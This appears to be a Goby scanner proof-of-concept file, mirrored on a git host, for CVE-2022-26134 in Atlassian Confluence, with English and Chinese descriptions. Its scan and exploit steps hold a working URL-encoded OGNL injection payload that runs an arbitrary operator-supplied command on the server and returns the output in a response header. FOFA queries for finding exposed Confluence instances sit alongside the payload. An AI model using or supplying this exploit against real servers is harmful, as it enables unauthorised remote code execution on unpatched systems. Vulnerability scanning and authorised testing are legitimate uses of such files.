qwqdanchun
/
Goby
mirror of https://github.com/qwqdanchun/Goby.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Goby/json/Atlassian-Confluence-Webwor...

151 lines
6.6 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"Name": "Atlassian Confluence Webwork OGNL Inject (CVE-2022-26134)",
"Description": "<p>Atlassian confluence server is a server version of atlassian company that has enterprise knowledge management functions and supports collaborative software for building enterprise wikis.&nbsp;</p><p>Atlassian confluence has an ognl injection vulnerability that allows authenticated users (in some cases unauthenticated users) to execute arbitrary code on the confluence server.<br></p>",
"Product": "atlassian-confluence",
"Homepage": "https://www.atlassian.com/zh/software/confluence",
"DisclosureDate": "2022-06-04",
"Author": "su18@javaweb.org",
"FofaQuery": "app=\"Confluence\"",
"GobyQuery": "app=\"Confluence\"",
"Level": "3",
"Impact": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">Atlassian confluence has an ognl injection vulnerability that allows authenticated users (in some cases unauthenticated users) to execute arbitrary code on the confluence server.</span><br></p>",
"Recommendation": "<p><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">At present, the official is making relevant security patch updates. It is recommended to pay attention to the official information and update it in a timely manner.</span></p><p>Website:&nbsp;<a href=\"https://www.atlassian.com/zh/software/confluence\" target=\"_blank\">https://www.atlassian.com/zh/software/confluence</a></p>",
"References": [
"https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [
{
"name": "cmd",
"type": "input",
"value": "whoami",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22echo%20TTTest%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Test-Response%22%2C%23a%29%29%7D/",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "302",
"bz": ""
},
{
"type": "item",
"variable": "$head",
"operation": "contains",
"value": "X-Test-Response: TTTest",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22{{{cmd}}}%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "302",
"bz": ""
},
{
"type": "item",
"variable": "$head",
"operation": "contains",
"value": "X-Cmd-Response",
"bz": ""
}
]
},
"SetVariable": [
"output|lastheader|regex|X-Cmd-Response: (.*?)\\n"
]
}
],
"Tags": [
"Code Execution"
],
"VulType": [
"Code Execution"
],
"CVEIDs": [
"CVE-2022-26134"
],
"CNNVD": [
""
],
"CNVD": [
""
],
"CVSSScore": "9.8",
"Translation": {
"CN": {
"Name": "Atlassian Confluence Webwork OGNL 注入漏洞 (CVE-2022-26134)",
"Product": "atlassian-confluence",
"Description": "<p>Atlassian Confluence Server是Atlassian公司的一套具有企业知识管理功能并支持用于构建企业WiKi的协同软件的服务器版本。</p><p>Atlassian Confluence存在一个 OGNL 注入漏洞,允许经过身份验证的用户(在某些情况下未经身份验证的用户)在 Confluence 服务器执行任意代码。<br></p>",
"Recommendation": "<p>目前官方正在制作相关安全补丁更新,建议关注官方消息,及时更新。</p><p>官方网址:<a href=\"https://www.atlassian.com/zh/software/confluence\" target=\"_blank\">https://www.atlassian.com/zh/software/confluence</a></p>",
"Impact": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">Atlassian Confluence存在一个 OGNL 注入漏洞,允许经过身份验证的用户(在某些情况下未经身份验证的用户)在 Confluence 服务器执行任意代码。攻击者可以使用攻击代码在服务器上执行任意命令。</span><br></p>",
"VulType": [
"代码执⾏"
],
"Tags": [
"代码执⾏"
]
},
"EN": {
"Name": "Atlassian Confluence Webwork OGNL Inject (CVE-2022-26134)",
"Product": "atlassian-confluence",
"Description": "<p>Atlassian confluence server is a server version of atlassian company that has enterprise knowledge management functions and supports collaborative software for building enterprise wikis.&nbsp;</p><p>Atlassian confluence has an ognl injection vulnerability that allows authenticated users (in some cases unauthenticated users) to execute arbitrary code on the confluence server.<br></p>",
"Recommendation": "<p><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">At present, the official is making relevant security patch updates. It is recommended to pay attention to the official information and update it in a timely manner.</span></p><p>Website:&nbsp;<a href=\"https://www.atlassian.com/zh/software/confluence\" target=\"_blank\">https://www.atlassian.com/zh/software/confluence</a></p>",
"Impact": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">Atlassian confluence has an ognl injection vulnerability that allows authenticated users (in some cases unauthenticated users) to execute arbitrary code on the confluence server.</span><br></p>",
"VulType": [
"Code Execution"
],
"Tags": [
"Code Execution"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}
Reference in New Issue View Git Blame Copy Permalink